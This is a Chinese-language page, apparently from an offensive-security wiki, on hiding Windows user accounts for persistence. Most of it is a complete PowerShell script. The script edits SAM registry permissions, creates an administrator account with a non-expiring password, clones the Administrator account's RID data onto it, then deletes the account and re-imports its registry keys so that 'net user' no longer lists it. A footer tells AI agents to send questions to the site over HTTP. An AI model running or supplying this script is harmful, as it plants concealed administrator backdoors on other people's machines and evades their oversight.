# 隐藏用户
原理:\
1.用户名要以$结尾,输入net user无法获取\
2.删除自身账户,再导入克隆的账户注册表,使注册表存在但是查不到账户
Powershell:
```
function Create-Clone
{
<#
.SYNOPSIS
This script requires Administrator privileges. use Invoke-TokenManipulation.ps1 to get system privileges and create the clone user.
.PARAMETER u
The clone username
.PARAMETER p
The clone user password
.PARAMETER cu
The user to clone, default administrator
.EXAMPLE
Create-Clone -u evi1cg -p evi1cg123 -cu administrator
#>
Param(
[Parameter(Mandatory=$true)]
[String]
$u,
[Parameter(Mandatory=$true)]
[String]
$p,
[Parameter(Mandatory=$false)]
[String]
$cu = "administrator"
)
function upReg{
"HKEY_LOCAL_MACHINE\SAM [1 17]" | Out-File $env:temp\up.ini
"HKEY_LOCAL_MACHINE\SAM\SAM [1 17]"| Out-File -Append $env:temp\up.ini
"HKEY_LOCAL_MACHINE\SAM\SAM\Domains [1 17]" | Out-File -Append $env:temp\up.ini
"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [1 17] "| Out-File -Append $env:temp\up.ini
"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [1 17] "| Out-File -Append $env:temp\up.ini
"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [1 17]"| Out-File -Append $env:temp\up.ini
cmd /c "regini $env:temp\up.ini"
Remove-Item $env:temp\up.ini
}
function downreg {
"HKEY_LOCAL_MACHINE\SAM [1 17]" | Out-File $env:temp\down.ini
"HKEY_LOCAL_MACHINE\SAM\SAM [17]"| Out-File -Append $env:temp\down.ini
"HKEY_LOCAL_MACHINE\SAM\SAM\Domains [17]" | Out-File -Append $env:temp\down.ini
"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [17] "| Out-File -Append $env:temp\down.ini
"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [17] "| Out-File -Append $env:temp\down.ini
"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [17]"| Out-File -Append $env:temp\down.ini
cmd /c "regini $env:temp\down.ini"
Remove-Item $env:temp\down.ini
}
function Create-user ([string]$Username,[string]$Password) {
$group = "Administrators"
$existing = Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$Username"
if (!$existing) {
Write-Host "[*] Creating new local user $Username with password $Password"
& NET USER $Username $Password /add /y /expires:never | Out-Null
Write-Host "[*] Adding local user $Username to $group."
& NET LOCALGROUP $group $Username /add | Out-Null
}
else {
Write-Host "[*] Adding existing user $Username to $group."
& NET LOCALGROUP $group $Username /add | Out-Null
$adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
$exist = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
Write-Host "[*] Setting password for existing local user $Username"
$exist.SetPassword($Password)
}
Write-Host "[*] Ensuring password for $Username never expires."
& WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE | Out-Null
}
function GetUser-Key([string]$user)
{
cmd /c " echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$user [1 17] >> $env:temp\$user.ini"
cmd /c "regini $env:temp\$user.ini"
Remove-Item $env:temp\$user.ini
if(Test-Path -Path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$user"){
cmd /c "regedit /e $env:temp\$user.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$user""
$file = Get-Content "$env:temp\$user.reg" | Out-String
$pattern="@=hex\((.*?)\)\:"
$file -match $pattern |Out-Null
$key = "00000"+$matches[1]
Write-Host "[!]"$key
return $key
}else {
Write-Host "[-] SomeThing Wrong !"
}
}
function Clone ([string]$ukey,[string]$cukey) {
"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$ukey [1 17] "| Out-File $env:temp\f.ini
"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$cukey [1 17] " | Out-File $env:temp\f.ini
cmd /c " regini $env:temp\f.ini"
Remove-Item $env:temp\f.ini
$ureg = "HKLM:\SAM\SAM\Domains\Account\Users\$ukey" |Out-String
$cureg = "HKLM:\SAM\SAM\Domains\Account\Users\$cukey" |Out-String
Write-Host "[*] Get clone user'F value"
$cuFreg = Get-Item -Path $cureg.Trim()
$cuFvalue = $cuFreg.GetValue('F')
Write-Host "[*] Change user'F value"
Set-ItemProperty -path $ureg.Trim() -Name "F" -value $cuFvalue
$outreg = "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$ukey"
cmd /c "regedit /e $env:temp\out.reg $outreg.Trim()"
}
function Main () {
if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator"))
{
Write-Output "Script must be run as administrator"
break
}
Write-Output "[*] Start"
Write-Output "[*] Tring to change reg privilege !"
upReg
if( !(Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$cu")){
Write-Host "[-] The User to Clone does not exist !"
Write-Output "[*] Change reg privilege back !"
downReg
Write-Output "[*] Exiting !"
}
else {
if(!(Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$u")){
$tmp = "1"
}
else{
$tmp = "0"
}
Write-Output "[*] Create User..."
Create-user $u $p
Write-Output "[*] Get User $u's Key .."
$ukey = GetUser-Key $u |Out-String
Write-Output "[*] Get User $cu's Key .."
$cukey = GetUser-Key $cu |Out-String
Write-Output "[*] Clone User.."
Clone $ukey $cukey
if($tmp -eq 1 ){
Write-Output "[*] Delete User.."
cmd /c "net User $u /del " |Out-Null
}else{ Write-Output "[*] Don't need to delete.."}
cmd /c "regedit /s $env:temp\$u.reg"
cmd /c "regedit /s $env:temp\out.reg"
Remove-Item $env:temp\*.reg
Write-Output "[*] Change reg privilege back !"
downreg
Write-Output "[*] Done"
}
}
Main
}
```
参考文章:
{% embed url="" %}
{% embed url="" %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://docs.qwqdanchun.com/main/persistence/user/hide-user.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.